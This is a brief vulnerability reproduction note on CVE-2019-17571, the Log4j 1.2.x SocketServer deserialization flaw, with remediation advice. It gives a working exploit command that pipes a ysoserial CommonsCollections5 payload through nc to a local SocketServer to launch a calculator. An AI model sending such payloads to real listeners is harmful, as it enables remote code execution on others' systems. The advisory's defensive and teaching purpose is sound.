Apache Log4j SocketServer 反序列化漏洞复现

Apache Log4j is a Java-based logging tool. It is a project of the Apache Software Foundation and one of several Java logging frameworks.

Recently, Apache Log4j officially disclosed that there is a deserialization vulnerability (CVE-2019-17571) in the SocketServer class in version 1.2.x. The attacker can exploit the vulnerability to realize remote code execution.

The org.apache.log4j.net.SocketServer class in the Log4j 1.2.x version has a deserialization vulnerability. When the Socket listening service created using the Log4j SocketServer class processes accepted data, it is easy to deserialize untrusted data. Combined with the deserialization widget, attackers can implement remote code execution.

环境搭建

jar package :

1

java -cp log4j-1.2.17.jar:commons-collections-3.1.jar org.apache.log4j.net.SocketServer 8888 ./log4jserver.properties ./

漏洞复现

1

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 'open -a Calculator' | nc 127.0.0.1 8888

After sending the payload, the calculator pops up successfully:

修复建议

The 1.2 series version of Apache Log4j was officially suspended in August 2015. The vulnerability has been fixed in version 2.8.2. It is recommended to upgrade to version 2.8.2 or higher as soon as possible;

Download address: https://logging.apache.org/log4j/2.x/download.html

Stop creating Socket service using the Log4j SocketServer class. The functions of the SocketServer class that does not use Log4j are not affected by vulnerabilities;